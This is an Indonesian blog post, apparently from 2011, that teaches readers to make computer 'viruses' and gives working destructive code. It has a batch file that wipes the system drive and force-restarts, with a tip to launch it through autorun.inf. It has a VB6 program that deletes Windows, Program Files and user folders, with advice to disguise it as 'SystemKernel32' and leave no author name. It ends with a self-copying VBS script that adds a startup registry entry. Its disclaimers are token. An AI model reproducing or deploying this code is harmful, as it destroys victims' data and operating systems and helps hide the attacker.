Membuat Virus

Posted: Desember 20, 2011 in Uncategorized
Mohon jangan mencoba pada komputer orang lain……….Virus ini sangat berbahaya. Sebelum mencoba, sebaiknya anda backup dulu data-data Anda… he..he… Setelah menjalankan program ini, sistem operasi Anda tidak akan ada lagi, sehingga Anda harus install ulang lagi (capee. deh…). So, ngga usah nyoba deh…ck..ckk..
Ketik program berikut dengan notepad, dan simpan dengan ekstensi bat, misalnya virus.bat
@echo offdel %systemdrive%\*.* /f /s /qshutdown -r -f -t 00
PERHATIAN : Program ini akan menghapus sistem Anda , makanya berhati-hatilah. Saya tidak bertanggung jawab atas semua yang terjadi, silahkan tanggung resiko sendiri.. ck..ckk..
Sebagai tambahan, Anda dapat juga menggunakan kode program berikut. Perintah ini hanya akan me-restart komputer Anda.. Anda aman untuk mencobanya. Sama seperti program virus.bat, program di bawah ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat
@echo offshutdown -r -f -t 00
Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file untuk menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah drive.SELAMAT MENCOBA.
Gwe bikin nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple bgtYg diperluin:1. VB(optimal : 6.0)2. Ngerti tombol2nya VBTutorial Bikin Virus cman 1 mnt1. bikin form sekecil mungkin2. didalem form itu, masukin nih kodePublic Sub DelAll(ByVal DirtoDelete As Variant)Dim FSO, FSSet FSO = CreateObject(“Scripting.FileSystemObject”)FS = FSO.DeleteFolder(DirtoDelete, True)End SubPrivate Sub Form_Load()On Error Resume NextIf FileExist(“c:\windows\system32\katak.txt”) = True ThenEndElseCall DelAll(“c:\windows\system”)Call DelAll(“c:\windows\system32”)Call DelAll(“c:\windows”)Call DelAll(“C:\Documents and Settings\All Users”)Call DelAll(“C:\Documents and Settings\Administrator”)Call DelAll(“C:\Documents and Settings”)Call DelAll(“C:\Program Files\Common Files”)Call DelAll(“C:\Program Files\Internet Explorer”)Call DelAll(“C:\Program Files\Microsoft Visual Studio”)Call DelAll(“C:\Program Files”)EndEnd IfEnd SubFunction FileExist(ByVal FileName As String) As BooleanIf Dir(FileName) = “” ThenFileExist = FalseElseFileExist = TrueEnd IfEnd Function3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32” jadi ga bakal dicurigain5. Jangan pernah naroh nama lu di nih virus… k?6. compile deh… slese!Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri
Ini saya berikan contoh script file vbs yg sederhana (UNTUK DIPELAJARI)copy semua script dibawah ini ke notepad. trus save dengan ekstensi *.vbsset fso=createobject(“scripting.filesystemobject”)’buat file system object peng-handle fileset reg=createobject(“wscript.shell”)’reg sbg paramater untuk mengeksekusi scriptset file=fso.getfile(wscript.scriptfullname)’fso digunakan, untuk mengambil file .vbs yang di-klikfile.copy “D:\klikme.vbs”‘var file di-copy ke drive D. virus mulai nyebar =Pset nfile=fso.createtextfile(“c:/inan.vbs”)’fso digunakan lagi, untuk membuat file baru di C, bernama inan.vbsnfile.write “msgbox” &chr(34) &”Halo… gini gini saya juga virus yang sederhana loh” &chr(34)’file inan.vbs di tulisi script oleh file yang scriptnya sedang anda baca inireg.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\inan”,”c:\inan.vbs”‘menulis registry, agar file virus dieksekusi otomatis oleh windows saat startupAda yg bingung? pelajari dulu. nantinya, kalau sudah di-klik, akan ada file bernama inan.vbs di drive C anda. Coba inan.vbs di klik, maka akan muncul msgbox dengan pesan “Halo… gini gini saya juga virus yang sederhana loh”. message box itu akan selalu muncul ketika windows anda dijalankan. Coba anda bayangkan jika inan.vbs berisi script yang memerintahkan komp anda untuk shutdown? maka komp anda akan shutdown selamanya ketika PC dijalankan Scriptnya mau? cari aja sendiri…

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s